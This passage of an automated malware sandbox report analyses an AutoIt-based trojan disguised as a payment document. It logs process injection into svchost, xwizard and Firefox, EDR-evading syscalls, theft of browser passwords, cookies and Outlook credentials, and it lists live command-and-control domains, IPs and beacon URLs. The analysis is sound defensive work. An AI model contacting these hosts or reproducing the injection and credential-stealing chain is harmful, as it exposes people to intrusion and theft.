            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\xwizard.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\xwizard.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Payment Copy #190922-001.exe | Static file information: File size 1201664 > 1048576
            Source: Payment Copy #190922-001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Payment Copy #190922-001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Payment Copy #190922-001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Payment Copy #190922-001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Payment Copy #190922-001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Payment Copy #190922-001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Payment Copy #190922-001.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596619254.00000000003AE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Payment Copy #190922-001.exe, 00000000.00000003.11307708681.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Payment Copy #190922-001.exe, 00000000.00000003.11308525255.0000000004680000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11584291378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003236000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11582690162.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003100000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004810000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004946000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11677267845.0000000004654000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11675115446.00000000044A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Payment Copy #190922-001.exe, 00000000.00000003.11307708681.0000000004830000.00000004.00001000.00020000.00000000.sdmp, Payment Copy #190922-001.exe, 00000000.00000003.11308525255.0000000004680000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11584291378.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003236000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11582690162.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.11674320716.0000000003100000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004810000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12536845992.0000000004946000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11677267845.0000000004654000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000003.11675115446.00000000044A0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: svchost.exe, 00000004.00000003.11642197334.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11641588647.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.00000000060EC000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.00000000060EC000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.11972919990.000000000A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000004.00000003.11642197334.0000000002A2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.11641588647.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp
            Source: Payment Copy #190922-001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Payment Copy #190922-001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Payment Copy #190922-001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Payment Copy #190922-001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Payment Copy #190922-001.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\xwizard.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\xwizard.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\xwizard.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\xwizard.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\xwizard.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | API/Special instruction interceptor: Address: 154A14C
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFD76B10454
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFD76B10914
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFD76B10A74
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFD76B10634
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFD76B10674
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFD76B10314
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFD76B13424
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFD76B10B74
            Source: C:\Windows\SysWOW64\xwizard.exe | Window / User API: threadDelayed 5737
            Source: C:\Windows\SysWOW64\xwizard.exe | Window / User API: threadDelayed 4236
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe TID: 7392 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 7324 | Thread sleep count: 5737 > 30
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 7324 | Thread sleep time: -11474000s >= -30000s
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 7324 | Thread sleep count: 4236 > 30
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 7324 | Thread sleep time: -8472000s >= -30000s
            Source: C:\Windows\SysWOW64\xwizard.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\xwizard.exe | Last function: Thread delayed
            Source: xwizard.exe, 0000000F.00000002.12535879368.0000000000A05000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
            Source: gXhpelxbquSwSp.exe, 0000000E.00000003.11743289735.000000000134C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWd<
            Source: gXhpelxbquSwSp.exe, 0000000E.00000002.12536337922.0000000001369000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.11975192526.00000205CA67E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\xwizard.exe | Process queried: DebugPort

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtTerminateThread: Direct from: 0x772170FC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtReadVirtualMemory: Direct from: 0x77216FBC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtResumeThread: Direct from: 0x7721783C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtMapViewOfSection: Direct from: 0x77216E4C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtWriteVirtualMemory: Direct from: 0x77216F6C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtReadFile: Direct from: 0x77216C0C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtAllocateVirtualMemory: Direct from: 0x77218B0C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtAllocateVirtualMemory: Direct from: 0x77216D2C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtWriteVirtualMemory: Direct from: 0x77218B2C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtSetInformationProcess: Direct from: 0x77216D8C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtOpenKeyEx: Direct from: 0x77217E5C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtUnmapViewOfSection: Direct from: 0x77216E6C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtQueryVolumeInformationFile: Direct from: 0x7721705C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtQueryInformationToken: Direct from: 0x77216DDC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtCreateFile: Direct from: 0x7721711C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtOpenFile: Direct from: 0x77216EFC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtCreateKey: Direct from: 0x77216D9C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtClose: Direct from: 0x77216C9C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtResumeThread: Direct from: 0x772170EC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtOpenSection: Direct from: 0x77216F3C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtQueryValueKey: Direct from: 0x77216D1C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtDeviceIoControlFile: Direct from: 0x77216C1C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtQueryAttributesFile: Direct from: 0x77216F9C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtSetInformationThread: Direct from: 0x77216C7C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtProtectVirtualMemory: Direct from: 0x772170CC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtQuerySystemInformation: Direct from: 0x77218AEC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtProtectVirtualMemory: Direct from: 0x7720C09F
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtQuerySystemInformation: Direct from: 0x77216F2C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtSetInformationThread: Direct from: 0x771FE6F9
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtCreateUserProcess: Direct from: 0x772178BC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtDelayExecution: Direct from: 0x77216F0C
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtOpenKeyEx: Direct from: 0x77216CCC
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtQueryInformationProcess: Direct from: 0x77216D56
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | NtNotifyChangeKey: Direct from: 0x77217DDC
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe protection: read write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Thread register set: target process: 6060
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 259E008
            Source: C:\Users\user\Desktop\Payment Copy #190922-001.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Copy #190922-001.exe"
            Source: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe | Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: Payment Copy #190922-001.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596998095.0000000001900000.00000002.00000001.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12536551964.0000000001900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596998095.0000000001900000.00000002.00000001.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12536551964.0000000001900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager&%
            Source: gXhpelxbquSwSp.exe, 0000000E.00000000.11596998095.0000000001900000.00000002.00000001.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12536551964.0000000001900000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman

            Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\xwizard.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

Source: Yara match | File source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques matched by signatures, with the number prefixed to each cell in the original matrix; unmatched template cells of the matrix are omitted)

Tactic | Matched technique (count)
Persistence | DLL Side-Loading (1)
Privilege Escalation | Process Injection (312); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Defense Evasion | Virtualization/Sandbox Evasion (2); Process Injection (312); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Credential Access | OS Credential Dumping (1)
Discovery | Security Software Discovery (111); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Collection | Email Collection (1); Data from Local System (1)
Command and Control | Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4)
Reconnaissance, Resource Development, Initial Access, Execution, Lateral Movement, Exfiltration, Impact | no matched techniques
Behavior Graph (ID: 1574653; sample: Payment Copy #190922-001.exe; start date: 13/12/2024; architecture: WINDOWS; score: 100)

Root network nodes: www.y6h6kn.top; www.telepzow.fit; 7 other IPs or domains
Root signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 7 other signatures

Process chain with per-node annotations:
Payment Copy #190922-001.exe (started)
  signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  -> svchost.exe (started)
     signatures: Maps a DLL or memory area into another process
     -> gXhpelxbquSwSp.exe (injected)
        network: thesnusgang.fun 84.32.84.32, ports 49781, 49785, 49786 (NTT-LT-ASLT, Lithuania); www.y6h6kn.top 103.23.149.28, ports 49777, 80 (DIGINET-AS-VNDigitaltelecomminicationservicejointstock, country unknown); 2 other IPs or domains
        signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> xwizard.exe (started)
           signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
           -> firefox.exe (started)

Source | Detection | Scanner | Label
Payment Copy #190922-001.exe | 37% | ReversingLabs | Win32.Trojan.AutoitInject
Payment Copy #190922-001.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
http://www.deadshoy.tech | 0% | Avira URL Cloud | safe
http://www.telepzow.fit/oizn/ | 100% | Avira URL Cloud | phishing
https://autoitscript.compb_rtb_ev_partv20 | 0% | Avira URL Cloud | safe
http://www.y6h6kn.top/jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf | 0% | Avira URL Cloud | safe
https://google.comVISITOR_INFO1_LIVE/ | 0% | Avira URL Cloud | safe
http://www.dnft.immo/yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf | 0% | Avira URL Cloud | safe
https://autoitscript.comVPv20 | 0% | Avira URL Cloud | safe
http://www.thesnusgang.fun/z4qr/ | 0% | Avira URL Cloud | safe
https://google.comVISITOR_PRIVACY_METADATA/ | 0% | Avira URL Cloud | safe
https://autoitscript.compb_rtb_ev_part/ | 0% | Avira URL Cloud | safe
http://www.thesnusgang.fun/z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf | 0% | Avira URL Cloud | safe
http://www.deadshoy.tech/0sq9/ | 0% | Avira URL Cloud | safe
